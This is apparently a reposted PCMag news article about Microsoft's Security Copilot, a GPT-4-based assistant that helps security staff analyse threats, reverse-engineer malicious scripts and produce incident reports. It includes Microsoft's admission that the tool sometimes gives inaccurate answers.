security

Microsoft Uses ChatGPT Tech to Help Security Industry Fend Off … – PCMag


Microsoft is bringing the technology behind ChatGPT to the cybersecurity industry by designing a program smart enough to help IT professionals fend off attacks. 

Security Copilot is a virtual assistant that can help IT staffers analyze and pounce on security threats facing their organization. “With Security Copilot, defenders can respond to security incidents within minutes instead of hours or days,” the company says(Opens in a new window).

The program is essentially an analysis tool that incorporates the capabilities of OpenAI’s newest GPT-4 language model, which can sum up libraries of text, write professional-grade responses, and even program computer code. 

How the program works.


(Credit: Microsoft)

Like ChatGPT, Security Copilot(Opens in a new window) functions in a prompt bar. In a demo, Microsoft showed you can ask it for a summary about a new vulnerability, submit a suspected malicious file for analysis, or report the latest security incidents that occurred inside an internal network. 

In return, Security Copilot can fetch data from Microsoft’s other security products, including the company’s threat intelligence, to come up with the appropriate response. 

In another example, the program was smart enough to analyze the source of an attack, including which device was infected, through what domain, and the system processes involved. An IT security analyst can also use the tool to scan a corporate network for emails and logins for patterns that match suspected threats.

The program generating a security report.


(Credit: Microsoft)

The program’s other powerful capability is a “prompt book,” a collection of text inputs that can automate Security Copilot to handle a task. In the demo, Microsoft showed one such prompt causing Security Copilot to reverse-engineer a malicious script in seconds, generating a report that highlighted the various attributes to the attack.  

Recommended by Our Editors

The program reverse-engineering a Powershell script.


(Credit: Microsoft)

The results promise to streamline cybersecurity work, freeing up humans to focus on more pressing tasks. The capabilities were enough to impress the research firm Forrester at a time when data breaches and ransomware attacks remain rampant. “This is the first time a product is poised to deliver on true improvement to investigation and response with AI,” Forrester Senior Analyst Allie Mellen said in a statement.

That said, Microsoft concedes Copilot won’t always generate an accurate response. In one example, the company showed Copilot referencing “Windows 9,” a non-existent OS, in an answer about the scope of a security threat. However, users will be able to flag incorrect responses. “As we continue to learn from these interactions, we are adjusting its responses to create more coherent, relevant and useful answers,” the company adds. 

Microsoft says all the data entered into the program remains private. In addition, the company plans on expanding Security Copilot so that it can connect with third-party security products. However, it’ll take a while before Microsoft releases the program to the cybersecurity industry. Security Copilot is currently in preview; expect more details in the coming months.

Like What You’re Reading?

Sign up for SecurityWatch newsletter for our top privacy and security stories delivered right to your inbox.

This newsletter may contain advertising, deals, or affiliate links. Subscribing to a newsletter indicates your consent to our Terms of Use and Privacy Policy. You may unsubscribe from the newsletters at any time.





READ SOURCE

This website uses cookies. By continuing to use this site, you accept our use of cookies.